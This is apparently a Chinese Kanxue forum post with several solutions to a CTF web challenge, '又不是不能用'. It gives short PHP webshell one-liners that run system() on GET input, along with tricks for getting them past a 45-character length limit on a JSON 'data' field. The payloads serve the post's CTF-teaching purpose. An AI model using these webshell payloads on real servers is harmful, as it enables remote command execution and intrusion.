原题作者的题解:https://bbs.kanxue.com/thread-258577.htm题目作者的题解题目在原题的基础上进行了略微修改:将data的长度限制从56改到45:原题:现在:
{"data": "<?php system(pos(array_keys($_GET)))?>"}然后再进行和作者题解相同的后续操作便可得到flag.2)还可以将一句话再进行缩短,将array_keys去掉{"data": "<?php system(pos($_GET))?>"}array_keys的作用是 “提取键名数组,如果不加array_keys,那么后续利用该php文件时提取的就不是键值而是$_GET的第一个值,那么可以在cat前面随意加一个键值,比如"cmd"等等,如图便可以读出flag。3)题目对“data”进行长度限制,那么可以把“data”改为任意值之后再利用原题解中的一句话,比如:{"da": "<?php system(pos(array_keys(pos(get_defined_vars()))))?>"}{"dat": "<?php system(pos(array_keys(pos(get_defined_vars()))))?>"}{"dataaa": "<?php system(pos(array_keys(pos(get_defined_vars()))))?>"}这样便可以上传成功,之后的操作相同,便可以获得flag。
传播安全知识、拓宽行业人脉——看雪讲师团队等你加入!
#文件
#其他
---
来源: 看雪论坛
原文链接: https://bbs.kanxue.com/thread-288918.htm
[分享]Web题集中《又不是不能用》的几种解法
311 浏览
0 回复
暂无回复,快来抢沙发吧!